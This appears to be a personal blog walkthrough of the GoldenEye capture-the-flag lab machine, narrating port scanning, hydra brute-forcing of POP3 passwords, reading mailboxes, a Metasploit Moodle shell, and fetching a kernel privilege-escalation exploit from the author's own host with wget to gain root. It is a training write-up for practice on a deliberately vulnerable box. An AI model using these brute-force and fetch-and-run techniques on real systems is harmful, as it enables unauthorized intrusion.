Took me a good two weeks to get pop this box. With the help of heaps of googling, I managed to break into this. I wanted to try a more difficult CTF this time around.. The author of this box wanted to created an OSCP Style box which is perfect for my needs as well.
I recently got done creating an OSCP type vulnerable machine that’s themed after the great James Bond film (and even better n64 game) GoldenEye. The goal is to get root and capture the secret GoldenEye codes — flag.txt.
I’d rate it as Intermediate, it has a good variety of techniques needed to get root — no exploit development/buffer overflows. After completing the OSCP I think this would be a great one to practice on, plus there’s a hint of CTF flavor.
Started off doing an nmap scan — Lets peak at the results.
There are 4 ports that are opened.
25 — SMTP
80 — HTTP
55006 — POP3
55007 — POP3
Lets have a look at port 80 and see what we can find. Some additional thoughts, I have never investigated port 25 and POP3 ports before so this will be the first CTF.
I ran a scan and to see if there was anything interesting. Before I start, this was a rabbit hole that didn’t lead me anywhere. I just thought I would add this in.
From the above screenshot, we can see a couple of interesting things (they were at the time).
I decided to browse to this website.
Nothing all too interesting. I even downloaded the Picture of Boris holding the Gun and typed in strings to see if there were any hidden passwords in it. Nothing..
I point my browser to 192.168.56.101 which is the IP of the box. Lets see what we can find.
We can see a pretty cool looking site, but nothing help us with anything. I thought about going to the link /sev-home/ to see if there was anything interesting there.
So it has given me a Username and password field. Nothing that I can see that provides me with this information. lets have a look at the source code. I right click and click on view source code.
The above image is the source code for the website. I can see something interesting which is terminal.js. I know this because this was the first step for Hackthebox invite code, in which I am still stuck on :(.
What I can do is use this as an extension for the site. Lets point our browser to 192.168.56.101/terminal.js
This is awesome! Alright, Now we can see a couple of different artifacts in which we can use:
I assume that this will be for the site /sev-home/. Also we have a username = Boris, I am thinking about using a Bruteforce attack to crack the password that could be for an SMPT or POP service.
Lets put the password into a decoder.
Nice! The password for Boris is: InvincibleHack3r
With this information, I will be using this to enter the site.
The above screenshot doesnt actually give me anything interesting, however, I did take into consideration the last paragraph. It states that they are have configured pop3 running on a very high non default port. Going back to our nmap scan, we can see that POP service is running on port 55006 and 55007.
My initial thought is to crack the password of Boris with Hydra on the POP3 Service to see if we can obtain a password.
I started cracking Boris’s password against the pop3 service with a smaller word list than usual.
hydra -l boris -P /usr/share/wordlists/fasttrack.txt -f 192.168.56.101 -s 55007 pop3
Lets look at the results.
The password is secret1! Feeling really good!!
No that we have cracked Boris’ password against the pop3 service. Lets see if we can log in by using telnet
From the above screenshot:
I managed to access his mailbox with the credentials and able to list the emails that he currently has in his inbox. He has 3 at the moment. Lets peak at them to see what the contents contain. I would like to take this opportunity to say that I wasted a lot of time googling the commands for a POP3 server! Who uses POP3 these days..
The first email doesn’t give us much. I used the command retr 1 / retr 2 / retr 3 to read the messages.
The 2nd email states that Natalya can break Boris’s codes. Nothing else. A side note, Because Natalya is emailing Boris, I might be able to crack her password as well. Lets have a look at the last email.
This email is soooo sly. Something fishy is about to happen! I really enjoy when the Author paints a story into these CTFs. It makes it so much more fun! Anyway, from what we can gather in the email, there is another user name Xenia for a training site. What is this training site they are talking about? Also Alec states that there are access codes attached to this email. In which I cannot see at all!!
I’ve been googling how to unhide attachments from pop3 servers, but no luck. This may be another rabbit hole that will lead me to no where. But it also might give me some clues.
Lets see if we can crack Natalya’s password against the pop3 service. I typed in the same command as I did previously, however I have replaced Boris with natalya.
hydra -l natalya -P /usr/share/wordlists/fasttrack.txt -f 192.168.56.101 -s 55007 pop3
Got it!! Her password is bird
Lets log onto her mailbox and read her emails!!
I telnet 192.168.56.101 55007 and entered her username and password of Natalya:bird
Im in! Lets type list to see how many contents are within the inbox.
Only 2 for Natalya. Lets read them one by one.
First email, states that Natalya should stop breaking into Boris’ codes (lol). Also to be cautious because there may be network breaches by a person named Janus!! This is all unfolding really nicely. It also states that Natayla is a GNO Supervisor for the training site.
I’m starting to see the picture now:
Lets move on and read the 2nd email.
Nice! So we have some information that we can work with now.
Awesome! So lets change the host name, and then proceed to go to the /gnocertdir/ and have a look whats there.
I changed the host file so that the IP address of 192.168.56.101 -> severnaya-station.com
The above image states that I have successfully changed the hosts file in linux.
After doing this, I can successfully confirm that this has resolved the DNS as expected.
Going to the DNS name instead of the IP address with the directory of /gnocertdir/ we can see the GoldenEye Operatiors Training website!
Something to keep in mind from observing this website is that it is powered by moodle
Lets log in as Xenia.
After scanning through the website, I see a message exchange from Dr Doak to Xenia. Doak had introduced himself. Something interesting that I picked up was:
My immediate thought is to crack Doaks password with hydra. Lets use the same command as we did last time, however replace natalya with Doak
hydra -l doak -P /usr/share/wordlists/fasttrack.txt -f 192.168.56.101 -s 55007 pop3
One again, it worked perfectly! Password for doak is goat. My thought is to have a look at his emails, so lets log onto that.
I used netcat 192.168.56.101 5507 to log onto his mailbox. I could of used telnet, but I wanted to try netcat to see if it works.
He only has 1 email. I had a look at this and can see a username and password. I’m killing it!!
Logged in as dr_doak with the correct credentials. Having a look around, I managed to stumble across to his Private files.
I could see that there is a file called s3cret.txt. Lets download this and have a look at its contents.
Looks like someone was able to capture the admin password for this Training site. This also means that we can use this username and password to attack the Moodle website through Metasploit. First, lets browse to the directory called /dir007key/for-007.jpg
Browsing the directory, it has given me a picture.
I right click and save it. I then typed in file for-007.jpg to see what type of file this is
From the above screenshot, I can see something interesting in the description.
I copy and pasted the contents of the description into burp decoder and was able to obtain the Admin password of xWinter1995x!
I fired up metasploit and searched for moodle to see if there are any exploits that I can use.
Moodle_cmd_exec looks to be the correct one to use. I typed in show options to see what fields I need to fill in, and filled it in accordingly. I then typed in exploit to run the exploit
From the above screenshot, I was able to obtain shell access!!
typed in id /whoami to see what permissions I am currently in. I also typed in which gcc to see if there is a complier that is installed on this server. However it is not. But cc is, so I need to make adjustments to the exploit manually to able to run any exploit.
I typed in uname -a to see which kernal version this server is running on. I quickly did a google and found that I can exploit this version by running an Privilege escalation exploitation
I downloaded the exploit and changed a setting from within the exploit so that It could compile and run properly on the Victim machine. I opened my trusty text editor and changed the gcc to cc
Sweet, so that looks good to go now. Lets go to the next step and transfer the file from my Kali machine to the victim machine
I set up a SimpleHTTPServer on port 6969 on my kali box. I then wget http://192.168.56.4:6969/37292.c. This downloaded successfully.
I compiled the exploit by typing in cc 37292.c -o evil. I then changed ownership of 700 on the exploit called evil.
I ran the newly configured exploit and was able to obtain root access on this box!! We can confirm this by typing in id.
Finally, I change directory into the root folder and cat the flag!! Its telling me to go to another directory which is on the webserver.
I pointed my browser to the new location and slayyed the final flag!